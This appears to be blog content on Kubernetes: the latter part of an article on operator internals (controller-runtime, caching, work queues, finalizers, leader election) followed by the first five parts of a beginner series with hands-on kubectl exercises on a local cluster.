Structural Schema is mandatory since apiextensions.k8s.io/v1 (Kubernetes 1.16+). Non-structural schemas are rejected by the API server. The openAPIV3Schema field defines the shape of your resource and enables server-side validation — every field must be described. This prevents garbage data from entering your system.

The Controller Runtime: Inside the Engine

The controller-runtime library (used by both Kubebuilder and Operator SDK) provides the scaffolding that most operators are built on. Let's dissect what it gives you.

The Manager is the top-level orchestrator. It:

Manages a shared cache (backed by informers) for all resource types your controllers care about
Provides a client that reads from the local cache and writes directly to the API server
Runs all controllers in goroutines
Handles leader election
Exposes health check and metrics endpoints

The Cache is the performance secret. Rather than every reconciliation hitting the API server, reads go to a local in-memory store that is kept in sync via informers. This reduces API server load dramatically and makes your operator fast.

The Client has two personalities:

Reader (cache-backed): Fast, eventually consistent. Used for Get and List operations during reconciliation. If you need strong consistency at a specific checkpoint, you can bypass the cache by constructing an uncached client — but do so sparingly, as it adds latency and API server load.
Writer (direct to API): Used for Create, Update, Patch, Delete, and Status().Update(). These always go directly to the API server, never through the cache.

Informers, Listers, and the Cache

This is where things get really interesting from an internals perspective. The Informer is the heart of the watch machinery.

The Reflector does the heavy lifting: it first performs a List to establish the initial state, then starts a long-lived Watch. If the watch connection drops (network blip, API server restart), the reflector automatically reconnects and re-lists if necessary.

The DeltaFIFO queue is a clever data structure that deduplicates events for the same object. If an object is modified 10 times before the controller gets around to processing it, they're collapsed. This is the first layer of the "level-triggered" behavior.

The Local Cache (a thread-safe store with indexes) is what client.Get and client.List read from. It's always slightly behind the API server (eventual consistency), but that's acceptable because your reconciler should be idempotent anyway.

Listers are typed wrappers over the cache that let you query by namespace or label selector without hitting the network.

The Reconciliation Loop in Depth

Here's the full picture of what happens from a watch event to a completed reconciliation:

A few nuances that trip people up:

The key is a namespace/name pair, not an object. When your reconciler is called, you only get the namespace and name. You must re-fetch the current state of the object from the cache. Never trust stale data passed in — always re-read at the top of your reconcile function.

Reconcile should be idempotent. It will be called multiple times for the same state. If you create a resource, check if it already exists first. If you apply a configuration, make it declarative. A reconcile that is accidentally destructive when called twice is a ticking time bomb.

Errors vs. Requeue. Returning an error causes the item to be requeued with exponential backoff (respecting the rate limiter). Returning ctrl.Result{Requeue: true} or ctrl.Result{RequeueAfter: duration} requeues without registering an error (no backoff increment). Use the former for actual errors, the latter for polling scenarios.

Work Queues and Rate Limiting

The work queue deserves its own section because it's where many operator performance issues originate.

The work queue has a built-in deduplication guarantee: if the same namespace/name is already in the queue, adding it again is a no-op. This means a burst of 100 events for the same object results in exactly one reconciliation.

The Processing Set ensures that while an item is being reconciled, any new events for that same item are queued but not dispatched until the current reconciliation completes. This prevents concurrent reconciliations for the same object.

Rate limiters in controller-runtime compose two strategies:

The ItemExponentialFailureRateLimiter tracks per-item failure counts and applies backoff: base * 2^failures up to a maximum. This prevents a persistently failing object from hammering the API server.

The BucketRateLimiter is a global token bucket that caps overall reconciliation throughput. This protects the API server from a thundering herd when many objects need reconciliation simultaneously (e.g., after an operator restart).

The default controller-runtime rate limiter combines per-item exponential backoff (base ~5ms, max ~1000s) with a global token bucket (~10 QPS, burst ~100). These defaults can vary across controller-runtime versions and are not guaranteed API contracts — always verify against your version's source. In high-scale environments, you'll almost certainly want to tune them.

Watches, Events, and Predicates

A controller needs to know which objects to watch. The .Watches() builder in controller-runtime lets you express complex watch topologies.

EnqueueRequestForOwner is the most common pattern: when a child resource changes (e.g., a Pod owned by your operator's StatefulSet), find the owner reference chain and enqueue the root owner. This lets the parent controller react to child state changes.

EnqueueMappedRequest (formerly EnqueueRequestsFromMapFunc) is a powerful escape hatch. Given any object event, you provide a function that maps it to zero or more reconcile requests. Use this for non-ownership relationships — e.g., when a shared Secret changes, requeue all operators that reference it.

Predicates filter events before they hit the queue. This is a critical optimization that's often overlooked:

// Only reconcile when spec changes, not on every status update
ctrl.NewControllerManagedBy(mgr).
    For(&myv1.Database{},
        builder.WithPredicates(predicate.GenerationChangedPredicate{})).
    Complete(r)

GenerationChangedPredicate is particularly valuable — it only triggers reconciliation when metadata.generation increments (which only happens on spec changes), ignoring pure status updates. Without this, every status write your controller does triggers another reconciliation, creating a tight loop.

Ownership, Finalizers, and Garbage Collection

This triad is where operator bugs tend to cluster. Let's be precise.

Owner References establish the parent-child relationship for garbage collection:

Finalizer deletion flow — what happens step by step when a user deletes an object with a finalizer:

Owner references tell the Kubernetes garbage collector that child objects should be deleted when the parent is deleted. Always set owner references on resources you create — without them, orphaned resources accumulate in the cluster.

ctrl.SetControllerReference(database, statefulSet, r.Scheme)

This sets the child's metadata.ownerReferences to point to the parent, with controller: true and blockOwnerDeletion: true.

Finalizers are strings in metadata.finalizers that prevent an object from being deleted until all finalizers are removed. When a user deletes an object with finalizers, Kubernetes sets metadata.deletionTimestamp but doesn't remove the object. Your controller must detect this, do cleanup work, remove its finalizer, and then update the object — at which point Kubernetes deletes it.

Common finalizer pattern:

const myFinalizer = "mycompany.io/database-finalizer"

func (r *Reconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    db := &myv1.Database{}
    if err := r.Get(ctx, req.NamespacedName, db); err != nil {
        return ctrl.Result{}, client.IgnoreNotFound(err)
    }

    if !db.DeletionTimestamp.IsZero() {
        // Object is being deleted
        if controllerutil.ContainsFinalizer(db, myFinalizer) {
            if err := r.runCleanup(ctx, db); err != nil {
                return ctrl.Result{}, err
            }
            controllerutil.RemoveFinalizer(db, myFinalizer)
            return ctrl.Result{}, r.Update(ctx, db)
        }
        return ctrl.Result{}, nil
    }

    // Add finalizer if not present
    if !controllerutil.ContainsFinalizer(db, myFinalizer) {
        controllerutil.AddFinalizer(db, myFinalizer)
        return ctrl.Result{}, r.Update(ctx, db)
    }

    // Normal reconciliation...
}

A critical warning: Finalizer logic must be robust and eventually complete. A finalizer that never removes itself will prevent the object from being garbage collected forever. Always provide a way to force-remove the finalizer in operational runbooks.

Status Subresource and Conditions

Your operator's primary communication channel with users (and other systems) is the status field. Get this right.

Always use the Conditions pattern for status. It's the Kubernetes-idiomatic way to communicate multi-dimensional state. The example below uses condition types modeled after the common Kubernetes Deployment pattern — adapt the types to your domain:

status:
  phase: Running
  observedGeneration: 5    # which spec generation this status reflects
  conditions:
    - type: Ready
      status: "True"
      lastTransitionTime: "2024-01-15T10:00:00Z"
      reason: AllReplicasReady
      message: "3/3 replicas are ready"
    - type: Progressing
      status: "False"
      lastTransitionTime: "2024-01-15T10:01:00Z"
      reason: ReplicaSetAvailable
      message: "Rollout complete"
    - type: Available
      status: "True"
      lastTransitionTime: "2024-01-14T08:00:00Z"
      reason: MinimumReplicasAvailable
      message: "Deployment has minimum availability"

observedGeneration is critical and frequently missed. It tells observers which version of the spec this status corresponds to. Without it, you can't tell if status.phase: Running means "running the spec you just applied" or "running an older spec while the new one is being processed."

Always update status with r.Status().Update(ctx, obj) not r.Update(ctx, obj). The status subresource has a separate endpoint and a separate RBAC policy. The main update endpoint ignores status changes; the status endpoint ignores spec changes.

Generation vs ObservedGeneration: A Deep Dive

This is one of the most misunderstood mechanics in operator development, yet it's fundamental to building correct status reporting. Let's be precise.

metadata.generation is a monotonically incrementing integer managed entirely by the API server. It increments only when the spec changes — status updates, label changes, and annotation changes do not increment it. This is why GenerationChangedPredicate works: it filters out the noise.

status.observedGeneration is a field your controller writes to status after completing a reconciliation. It should be set to the metadata.generation value of the object you just reconciled.

The pattern lets any observer — including kubectl wait, GitOps controllers, and your own tooling — determine whether the controller has finished processing the latest spec without any out-of-band signaling:

func (r *Reconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    db := &myv1.Database{}
    if err := r.Get(ctx, req.NamespacedName, db); err != nil {
        return ctrl.Result{}, client.IgnoreNotFound(err)
    }

    // ... reconcile logic ...

    // At the end: stamp observedGeneration
    db.Status.ObservedGeneration = db.Generation
    db.Status.Phase = "Running"
    return ctrl.Result{}, r.Status().Update(ctx, db)
}

Without observedGeneration, a status.phase: Running is ambiguous — it could mean "running the spec you just applied 30 seconds ago" or "running an old spec that's three versions behind." With it, observers have a precise, reliable signal.

Concurrency, MaxConcurrentReconciles, and Cache Scoping

MaxConcurrentReconciles

By default, controller-runtime runs one reconciler goroutine per controller. For many operators this is fine, but for operators managing hundreds or thousands of independent custom resources, this is a significant throughput bottleneck. Enter MaxConcurrentReconciles:

ctrl.NewControllerManagedBy(mgr).
    For(&myv1.Database{}).
    WithOptions(controller.Options{
        MaxConcurrentReconciles: 10,
    }).
    Complete(r)

This allows up to 10 reconciler goroutines to run in parallel for different objects. A few important points:

The work queue guarantees per-object serialization. Even with MaxConcurrentReconciles: 10, the same namespace/name key will never be dispatched to two goroutines simultaneously. You get concurrency across different objects, not within a single object's reconciliation chain.

Your reconciler must be goroutine-safe. Any shared state (metrics counters, caches, client connections) must be safe for concurrent access. The controller-runtime client is safe. Custom state you add to the reconciler struct is your responsibility.

Rate limiting still applies globally. High MaxConcurrentReconciles combined with a tight rate limiter creates goroutines waiting on the rate limiter. Tune both together.

A good starting heuristic: set MaxConcurrentReconciles to roughly the number of objects you expect divided by the average reconcile latency in seconds. For 1000 objects reconciling in ~500ms each, MaxConcurrentReconciles: 5 gives you comfortable throughput headroom.

Cache Scoping for Large Clusters

By default, the controller-runtime cache watches all namespaces. In large multi-tenant clusters this can mean caching thousands of objects your operator doesn't care about. Cache scoping is the solution:

mgr, err := ctrl.NewManager(cfg, ctrl.Options{
    Cache: cache.Options{
        // Only cache objects in specific namespaces
        DefaultNamespaces: map[string]cache.Config{
            "tenant-a": {},
            "tenant-b": {},
        },
    },
})

Field indexing is another powerful tool. If your reconciler frequently lists objects filtered by a custom field, add an index to the cache:

// Index Databases by their referenced Secret name
if err := mgr.GetFieldIndexer().IndexField(
    ctx,
    &myv1.Database{},
    ".spec.credentialsSecret",
    func(obj client.Object) []string {
        db := obj.(*myv1.Database)
        return []string{db.Spec.CredentialsSecret}
    },
); err != nil {
    return err
}

// Now you can efficiently list all DBs referencing a secret
dbList := &myv1.DatabaseList{}
r.List(ctx, dbList, client.MatchingFields{".spec.credentialsSecret": secretName})

Without an index, this List does a full cache scan. With it, it's an O(1) lookup. At scale, this is the difference between a 1ms and 200ms reconciliation.

Optimistic Locking and Conflict Retries

API server conflicts (409 Conflict) are a normal part of operating at scale. When your reconciler reads an object, modifies it, and writes it back — and something else has modified it in between — you get a conflict. The correct response is to re-read and retry:

import "k8s.io/client-go/util/retry"

err := retry.RetryOnConflict(retry.DefaultRetry, func() error {
    // Re-fetch to get the latest resourceVersion
    if err := r.Get(ctx, req.NamespacedName, db); err != nil {
        return err
    }
    // Apply your changes to the freshly-fetched object
    db.Status.Phase = computedPhase
    return r.Status().Update(ctx, db)
})

retry.DefaultRetry uses exponential backoff (5 retries, 10ms base, 1.0 jitter). For status updates this is usually sufficient. For spec updates, prefer server-side apply which handles conflicts at the field ownership level rather than requiring a full re-read/retry.

Leader Election

In production, you run multiple replicas of your operator for high availability. But you don't want multiple replicas simultaneously reconciling the same objects — that leads to conflicts and thrashing. Leader election solves this.

Controller-runtime uses a Lease object in the cluster as the distributed lock. The leader holds the lease by periodically renewing it. If the leader fails to renew before the lease expires, another replica acquires it.

Configuration in controller-runtime:

mgr, err := ctrl.NewManager(cfg, ctrl.Options{
    LeaderElection:          true,
    LeaderElectionID:        "my-operator-leader",
    LeaderElectionNamespace: "my-operator-system",
    LeaseDuration:           &leaseDuration,  // default 15s
    RenewDeadline:           &renewDeadline,  // default 10s
    RetryPeriod:             &retryPeriod,    // default 2s
})

Standby replicas still run the cache — they maintain informers and local caches, but they don't start the controllers. This means failover is fast (no cold start for the informer sync) because the new leader already has a warm cache.

Important nuance: Leader election reduces the likelihood of concurrent reconciliations, but it does not eliminate it entirely. During the lease expiry window, a brief overlap is possible where both the old and new leader are active. Controllers must still be written to tolerate conflicts and retries. Never assume strict single-threaded execution at the cluster level — your reconciler must be safe to run concurrently.

Caution: Leader election adds latency to recovery. With LeaseDuration=15s, a leader failure can cause up to 15 seconds of no-reconciliation. Tune this based on your operator's latency requirements.

Webhooks: Admission and Conversion

Webhooks are the mechanism to inject logic into the API server's request pipeline.

Defaulting Webhooks (MutatingAdmissionWebhook) run before storage and let you inject default field values. This is essential for forward compatibility — when you add a new required field to v2 of your CRD, a defaulting webhook can populate it for resources created without it.

Validating Webhooks (ValidatingAdmissionWebhook) run after mutation and let you reject invalid requests with human-readable error messages. This is where you enforce complex business rules that can't be expressed in OpenAPI schema (cross-field validation, external system checks, etc.).

Conversion Webhooks are needed when you have multiple active API versions of a CRD. The API server stores objects in one version (the storage: true version) but can serve them in other versions. Conversion webhooks handle the transformation between versions.

// controller-runtime webhook setup
func (r *Database) Default() {
    if r.Spec.Replicas == nil {
        defaultReplicas := int32(1)
        r.Spec.Replicas = &defaultReplicas
    }
}

func (r *Database) ValidateCreate() (admission.Warnings, error) {
    if r.Spec.StorageSize.Cmp(minStorage) < 0 {
        return nil, fmt.Errorf("storage size must be at least %s", minStorage.String())
    }
    return nil, nil
}

Webhooks require TLS certificates and must be running before the API server can call them. Certificate management is operationally annoying — use cert-manager or controller-runtime's built-in certificate provisioner.

Operator Patterns and Anti-Patterns

After years of writing and reviewing operators, here's the distilled wisdom:

Patterns to Follow

Adopt Whenever Possible: Use server-side apply (client.Apply) instead of create-or-update. It's declarative, handles field ownership correctly, and is idempotent by design. One critical caveat: if you adopt SSA, use it consistently for all managed resources. Mixing Update and Apply on the same fields causes managedFields ownership conflicts that are painful to debug and resolve.

// Instead of create-or-update dance:
patch := client.Apply
obj.ManagedFields = nil  // Let SSA manage this
err = r.Patch(ctx, obj, patch, client.ForceOwnership, client.FieldOwner("my-operator"))

Use Patch over Update: Always prefer Patch (specifically strategic merge patch or JSON patch) over Update for status and spec changes. Update replaces the entire object and is prone to conflicts; Patch is surgical and conflict-resistant.

Emit Events: Use the Event recorder to emit Kubernetes events for significant state transitions. This gives users visibility via kubectl describe:

r.Recorder.Event(db, corev1.EventTypeWarning, "ProvisioningFailed", "Failed to create PVC")

Separate controllers for separate concerns: Don't build a monolithic reconciler. If your operator manages both the database cluster and its backup schedule, use two controllers with a shared cache.

Anti-Patterns to Avoid

Don't store state in the controller process. Your controller can be restarted, scaled, or fail over at any moment. The only source of truth is the Kubernetes API. If you need to persist computed state, put it in status or in a ConfigMap.

Don't busy-loop with short requeue intervals. In most cases, sub-10-second polling intervals are unnecessary and wasteful. Prefer watch-based triggers unless the external system cannot emit events. For fast-moving, short-lived state machines (e.g., managing transient Jobs), shorter intervals may be valid — but they should be the exception, not the default. If you truly need polling, make the interval configurable so it can be tuned per deployment.

Don't ignore resourceVersion conflicts. A 409 Conflict from the API server means someone else updated the object between your read and write. The correct response is to re-fetch and retry, not to log and continue.

Don't call the API server inside tight loops. Fetching all pods to check readiness in a loop that runs every reconciliation is expensive. Use the cache, or precompute what you need at the start of reconciliation.

Don't use Update when Patch will do. Using r.Update(ctx, obj) after modifying the spec will overwrite any changes made between your read and your write. Prefer patch operations.

Observability and Debugging

An operator you can't observe is an operator you can't trust in production.

Metrics

Controller-runtime exports Prometheus metrics out of the box:

# Work queue depth — a leading indicator of reconciliation backlog
workqueue_depth{name="database"} 42

# Reconcile duration histogram — p99 tells you about slow reconciliations
controller_runtime_reconcile_time_seconds_bucket{controller="database", le="0.1"} 1000

# Reconcile errors — should be near zero in steady state
controller_runtime_reconcile_errors_total{controller="database"} 5

# Active goroutines in the work queue
workqueue_work_duration_seconds_bucket{name="database"}

Always add custom metrics for your domain:

var databasesProvisioning = prometheus.NewGauge(prometheus.GaugeOpts{
    Name: "myoperator_databases_provisioning",
    Help: "Number of databases currently in provisioning state",
})

Structured Logging

Use structured logging (logr interface) with consistent fields:

log := log.FromContext(ctx).WithValues(
    "database", req.NamespacedName,
    "generation", db.Generation,
    "phase", db.Status.Phase,
)
log.Info("Starting reconciliation")

Tracing

For complex operators with many API calls, distributed tracing (OpenTelemetry) provides invaluable insight into where time is spent during reconciliation.

Common Debugging Commands

# Watch reconciler output in real time
kubectl logs -n operator-system deploy/my-operator -f | jq '.'

# Inspect the CRD resource including status
kubectl get database mydb -o yaml

# Check events for a custom resource
kubectl describe database mydb

# Force a reconcile by touching the annotation
kubectl annotate database mydb force-reconcile=$(date +%s) --overwrite

# Check lease for leader election
kubectl get lease -n operator-system

Production Considerations

Resource Management

Always set resource requests and limits on your operator pod. An operator without limits can starve other workloads during a reconciliation storm.

RBAC Least Privilege

Your operator's ServiceAccount should only have the permissions it actually needs. A common mistake is granting cluster-admin for convenience. Use the Kubebuilder RBAC markers to generate precise RBAC manifests:

//+kubebuilder:rbac:groups=mycompany.io,resources=databases,verbs=get;list;watch;create;update;patch;delete
//+kubebuilder:rbac:groups=mycompany.io,resources=databases/status,verbs=get;update;patch
//+kubebuilder:rbac:groups=apps,resources=statefulsets,verbs=get;list;watch;create;update;patch;delete

Graceful Shutdown

Handle SIGTERM gracefully. The controller-runtime manager's Start function blocks until context cancellation, at which point it stops all controllers and waits for in-flight reconciliations to complete (up to a timeout). Make sure your reconciler respects context cancellation:

func (r *Reconciler) Reconcile(ctx context.Context, req ctrl.Request) (ctrl.Result, error) {
    // Check context at expensive checkpoints
    select {
    case <-ctx.Done():
        return ctrl.Result{}, ctx.Err()
    default:
    }
    // ... reconcile logic
}

Testing Strategy

Use envtest (from controller-runtime) for integration tests. It spins up a real etcd and API server, installs your CRDs, and lets you test full reconciliation loops without a cluster. This is your most valuable testing layer.

Upgrade Considerations

When upgrading your operator, consider:

CRD schema changes: Adding fields is safe. Removing or renaming fields is breaking. Use conversion webhooks for major schema evolution.
Controller logic changes: New reconciler behavior applied to existing resources — think through the transition. Add a migration annotation or one-time migration job if needed.
State machine transitions: If you're adding new phases to your state machine, ensure existing resources in "old" phases are handled by the updated controller.

Conclusion

Kubernetes Operators are one of the most powerful extension mechanisms ever built into a distributed system platform. But that power comes with complexity. The controller runtime, informers, work queues, rate limiters, finalizers, and webhooks form a sophisticated machinery that, once understood, enables you to build remarkably robust automation.

The key mental models to internalize:

Level-triggered reconciliation — always reconcile toward desired state, don't just react to events. This gives you resilience for free.

The cache is your friend — reads from cache, writes to API. This is the performance contract the entire system is designed around.

Idempotency is not optional — your reconciler will be called many times for the same state. Design it accordingly from day one.

Status is a contract — observedGeneration, conditions with reasons and messages, precise phase transitions. This is how your operator communicates with the world.

The operators you build are, in a very real sense, pieces of software that will run 24/7, autonomously managing production infrastructure. Treat them with the same rigor you'd apply to any production-critical system: test thoroughly, observe everything, and design for failure.

Ready to Build Your Own Operator?

If you want to go from zero to production-ready Kubernetes operators with hands-on practice, check out the Kubernetes Operators Course — a practical, end-to-end course that walks you through building operators from the basics all the way to production-grade patterns. It's a great companion to the internals covered in this post.

Found a bug or inaccuracy? The beauty of operators — and this blog post — is that there's always room for a reconciliation loop.

Originally published at https://platformwale.blog

Kubernetes for Beginners: A Multi-Part Series

Piyush Jajoo — Mon, 23 Feb 2026 02:45:19 +0000

Who is this for? Someone who has never touched Kubernetes but wants to understand it well enough to discuss it confidently — and even run a few things on their laptop.

Important mindset note: Kubernetes is not Heroku or a full application platform. It does not build your app, manage your CI/CD pipeline, or automatically apply production best practices. It is an orchestration system — a very powerful one — but you still have to bring your own containers, configuration, security posture, and operational practices. Think of it as an incredibly capable infrastructure layer, not a magic button.

Part 1 — What Problem Does Kubernetes Solve?
Part 2 — Core Concepts: The Kubernetes Vocabulary
Part 3 — The Architecture: How It All Fits Together
Part 4 — Hands-On: Your First Kubernetes App
Part 5 — Deployments, Scaling, and Self-Healing
Part 6 — Networking: Services and How Apps Talk to Each Other
Part 7 — Configuration and Secrets
Part 8 — Storage: Keeping Data Alive
Part 9 — Observability: Knowing What's Going On
Part 10 — Putting It All Together: The Big Picture
Appendix — Common Beginner Mistakes

Part 1 — What Problem Does Kubernetes Solve?

The World Before Kubernetes

Imagine you've built a web app. It runs on a single server. Life is simple. But then:

Traffic spikes — your server buckles.
A new version breaks everything — you have downtime.
Your server crashes at 2am — the app is down until someone wakes up.
You need to run 10 copies of the app — you SSH into 10 machines manually.

This is the problem Kubernetes was built to solve.

Containers First

Before Kubernetes, you need containers. A container is a lightweight, self-contained package that includes your app and everything it needs to run (libraries, runtime, config). Think of it as a shipping container: standardized, portable, stackable.

🐳 Docker popularized containers. If you haven't already, install Docker Desktop or an alternative like Podman:

Docker Desktop

Podman Desktop

So What Is Kubernetes?

Kubernetes (often abbreviated as K8s — 8 letters between K and s) is an open-source system for automating deployment, scaling, and management of containerized applications.

In plain English: Kubernetes is the conductor of an orchestra of containers. You declare what you want running, and it figures out how to make it happen and continuously keeps it that way.

Key Promises of Kubernetes

Promise	What it means
Self-healing	Crashed containers are restarted automatically
Scaling	Add or remove instances based on load
Rolling updates	Deploy new versions with zero downtime
Service discovery	Apps find each other without hardcoded IPs
Load balancing	Traffic is spread across healthy instances

What Kubernetes Does NOT Solve (Out of the Box)

This is important to know upfront so you're not surprised later:

Gap	What fills it
CI/CD pipelines	Jenkins, GitHub Actions, ArgoCD, Tekton
Container image security scanning	Trivy, Snyk, Harbor
Secret rotation	HashiCorp Vault, Sealed Secrets
Observability by default	You add Prometheus, Grafana, Loki yourself
Multi-region failover	Cluster federation, multi-cluster tools
App building/packaging	Helm, Kustomize, your own Dockerfile

A Note on History

Kubernetes was created by Google (based on their internal system called Borg) and open-sourced in 2014. It's now maintained by the Cloud Native Computing Foundation (CNCF) and is the de facto standard for container orchestration.

Version awareness: Kubernetes releases 3 minor versions per year (e.g., v1.28, v1.29, v1.30). APIs and behaviors can change between versions. Always check the Kubernetes changelog and verify compatibility with your cluster's version.

Part 2 — Core Concepts: The Kubernetes Vocabulary

One reason Kubernetes feels intimidating is the terminology. Let's demystify the key terms with real-world analogies.

Kubernetes Is a Declarative, Desired-State System

This is the most important idea in the whole series. In Kubernetes, you don't issue commands like "start this container now." Instead, you describe what you want to exist, and Kubernetes continuously works to make reality match that description.

Declarative: "I want 3 copies of my app running."
Imperative: "Start container 1. Start container 2. Start container 3."

Kubernetes is always declarative. Your YAML files express desired state. The system stores that desired state and reconciles it with reality forever.

The Cluster

A cluster is the entire Kubernetes environment — the collection of machines that Kubernetes manages together as one system.

Nodes

A node is an individual machine (physical or virtual) in the cluster. There are two types:

Control Plane node — the brain. It makes decisions about the cluster and stores desired state.
Worker nodes — where your actual application containers run.

Analogy: If the cluster is a restaurant, the control plane is the kitchen manager who tracks all the orders, and worker nodes are the individual chefs who actually cook.

Pods

A Pod is the smallest deployable unit in Kubernetes. A Pod wraps one or more containers that should always run together and share the same network and storage.

Analogy: If a container is a single fish, a Pod is the fish tank. Usually one fish per tank, but sometimes a few that need to live together.

Key facts about Pods:

Pods are ephemeral — they can be killed and replaced at any time.
Each Pod gets its own IP address inside the cluster's internal network. That IP is not routable outside the cluster and changes every time the Pod is rescheduled. Never hardcode a Pod IP.
You rarely create Pods directly — you use higher-level abstractions like Deployments.

Deployments

A Deployment tells Kubernetes: "I want X copies of this Pod running at all times, and here's how to roll out changes safely." It manages the full lifecycle of Pods — creating them, replacing crashed ones, and orchestrating updates.

Services

A Service gives Pods a stable network identity. Since Pods die and get new IPs constantly, a Service acts as a consistent entry point that routes traffic to healthy Pods matching a label selector.

Analogy: A Service is like a restaurant's phone number. The chefs (Pods) might change, but you always call the same number.

Namespaces

Namespaces are virtual partitions within a cluster. They let you organize and isolate resources — commonly used to separate environments (dev/staging/prod), teams, or projects within the same physical cluster.

ConfigMaps and Secrets

ConfigMap — stores non-sensitive configuration data (e.g., environment variables, config files).
Secret — stores sensitive data (e.g., passwords, API keys). Stored base64-encoded in etcd; base64 is encoding, not encryption.

Volumes and PersistentVolumes

Containers are stateless by default — their filesystem disappears when they stop. Volumes attach storage to Pods. PersistentVolumes (PV) are cluster-level storage resources that outlive individual Pods.

Quick Vocabulary Reference

Term	One-liner
Cluster	The whole Kubernetes environment
Node	A machine in the cluster
Pod	One or more containers scheduled together
Deployment	Manages desired state and updates of Pods
Service	Stable network endpoint that routes to Pods
Namespace	Virtual partition within a cluster
ConfigMap	Non-sensitive config data
Secret	Sensitive config data (base64-encoded at rest by default)
PersistentVolume	Storage that survives Pod restarts

Part 3 — The Architecture: How It All Fits Together

The Big Picture

Control Plane Components

API Server (kube-apiserver)
The front door to Kubernetes. Every command you run (via kubectl or any tool) goes through the API server over TLS. It validates requests, enforces authentication and authorization, and persists state to etcd.

etcd
A distributed key-value store that holds the desired state of the entire cluster — what resources exist, their configuration, and their status. If etcd is healthy and you have functioning nodes and storage backends, Kubernetes can reconstruct all workloads from scratch because the desired state is fully preserved there. Note that etcd does not store your container images, PersistentVolume data, or node OS state — those live elsewhere.

Scheduler (kube-scheduler)
Watches for newly created Pods that have no node assigned, then selects the best node to run them based on resource requests, node capacity, affinity rules, and other constraints.

Controller Manager (kube-controller-manager)
Runs a collection of controllers — background loops that watch the cluster state and take actions to move toward the desired state. The Deployment controller ensures the right number of Pod replicas are running. The Node controller notices when nodes go down. There are dozens of built-in controllers.

Worker Node Components

kubelet
An agent that runs on every worker node. It watches the API server for Pods assigned to its node and instructs the container runtime to start or stop containers accordingly. It also reports Pod health back to the control plane.

kube-proxy
Maintains network forwarding rules (traditionally via iptables or IPVS) on each node to implement Service routing. In modern clusters using eBPF-based networking (like Cilium), kube-proxy may be replaced entirely.

Container Runtime
The software that actually runs containers. Kubernetes uses the Container Runtime Interface (CRI) to support multiple runtimes. The most common today are containerd and CRI-O. Kubernetes previously communicated with Docker via a compatibility shim called dockershim, which was removed in Kubernetes v1.24.

The Reconciliation Loop (The Heart of Kubernetes)

This is the single most important concept to internalize. Kubernetes is always running reconciliation loops — comparing desired state with actual state and taking corrective action.

This loop never stops. If a Pod crashes at 3am, the controller loop notices within seconds and creates a replacement — no human intervention required.

Part 4 — Hands-On: Your First Kubernetes App

Setting Up a Local Cluster

You need a local Kubernetes environment. Pick one:

Tool	Best for	Link
minikube	Beginners, most documentation	minikube.sigs.k8s.io
kind (Kubernetes in Docker)	Lightweight, CI-friendly	kind.sigs.k8s.io
k3d	Fastest startup, uses k3s	k3d.io
Docker Desktop (built-in K8s)	If you already have Docker Desktop	Enable in Settings → Kubernetes
Rancher Desktop	Open-source Docker Desktop alternative	rancherdesktop.io

You'll also need kubectl — the command-line tool to interact with Kubernetes:

Install kubectl

Exercise 1: Start Your Cluster

# With minikube
minikube start

# Verify your cluster is running
kubectl cluster-info

# See your nodes
kubectl get nodes

Expected output (version number will vary):

NAME       STATUS   ROLES           AGE   VERSION
minikube   Ready    control-plane   1m    v1.28.0

Exercise 2: Deploy Your First App

Let's deploy a simple web server (nginx):

# Create a deployment
kubectl create deployment my-nginx --image=nginx

# Check it's running
kubectl get deployments
kubectl get pods

You should see a Pod with a status of Running.

Exercise 3: Expose It as a Service

# Expose the deployment as a service
kubectl expose deployment my-nginx --port=80 --type=NodePort

# Get the URL (minikube only)
minikube service my-nginx --url

Open the URL in your browser — you'll see the nginx welcome page. 🎉

Exercise 4: Explore with kubectl

# Describe a pod (get detailed info, including Events)
kubectl describe pod <pod-name>

# View logs
kubectl logs <pod-name>

# Get a shell inside a running container
kubectl exec -it <pod-name> -- /bin/bash

# Delete everything you created
kubectl delete deployment my-nginx
kubectl delete service my-nginx

Understanding kubectl Syntax

kubectl [command] [resource-type] [resource-name] [flags]

kubectl    get       pods          my-nginx-xxx    -n default

Common commands: get, describe, create, apply, delete, logs, exec

Part 5 — Deployments, Scaling, and Self-Healing

Writing YAML (Declarative Configuration)

So far we've used imperative commands (kubectl create). The Kubernetes way is declarative — you write a YAML file describing desired state, and Kubernetes makes it real and keeps it that way.

Here's a Deployment YAML with explanations:

# deployment.yaml
apiVersion: apps/v1
kind: Deployment
metadata:
  name: my-app
  labels:
    app: my-app
spec:
  replicas: 3                    # Desired number of Pod copies
  selector:
    matchLabels:
      app: my-app                # Manages Pods with this label
  strategy:
    type: RollingUpdate
    rollingUpdate:
      maxUnavailable: 25%        # Max pods that can be down during update
      maxSurge: 25%              # Max extra pods allowed during update
  template:                      # Pod template
    metadata:
      labels:
        app: my-app
    spec:
      containers:
      - name: my-app
        image: nginx:1.25
        ports:
        - containerPort: 80
        resources:
          requests:              # Used by Scheduler to pick a node
            memory: "64Mi"
            cpu: "250m"
          limits:                # Enforced at runtime by kubelet
            memory: "128Mi"
            cpu: "500m"

Resource Requests vs Limits — An Important Distinction

These two fields are frequently confused but serve very different purposes:

Always set resource requests. Without them, the scheduler has no information to make good placement decisions, and a single misbehaving app can starve other Pods on the same node.

Exercise 5: Apply a Deployment

# Save the YAML above as deployment.yaml, then:
kubectl apply -f deployment.yaml

# Watch Pods come to life
kubectl get pods --watch

# See all 3 replicas
kubectl get pods -l app=my-app

Exercise 6: Self-Healing in Action

# Delete one of the pods manually
kubectl delete pod <one-of-your-pod-names>

# Watch Kubernetes immediately create a replacement
kubectl get pods --watch

Within seconds, a new Pod appears. This is self-healing — the controller loop noticed the gap between desired state (3 replicas) and actual state (2 replicas) and corrected it.

Exercise 7: Scaling

# Scale up to 5 replicas
kubectl scale deployment my-app --replicas=5
kubectl get pods

# Or edit the YAML: change replicas: 3 to replicas: 5, then:
kubectl apply -f deployment.yaml   # The declarative way

# Scale back down
kubectl scale deployment my-app --replicas=2

Rolling Updates: Zero Downtime Deploys

When you update a Deployment (e.g., a new image version), Kubernetes performs a rolling update controlled by maxUnavailable and maxSurge. With 3 replicas and both set to 25% (rounded up to 1), the actual behavior looks like this:

The exact pacing depends on your maxUnavailable and maxSurge settings — Kubernetes may create or terminate multiple Pods at once for faster rollouts.

# Trigger a rolling update by changing the image version
kubectl set image deployment/my-app my-app=nginx:1.26

# Watch the rollout
kubectl rollout status deployment/my-app

# View rollout history
kubectl rollout history deployment/my-app

# Rollback if needed!
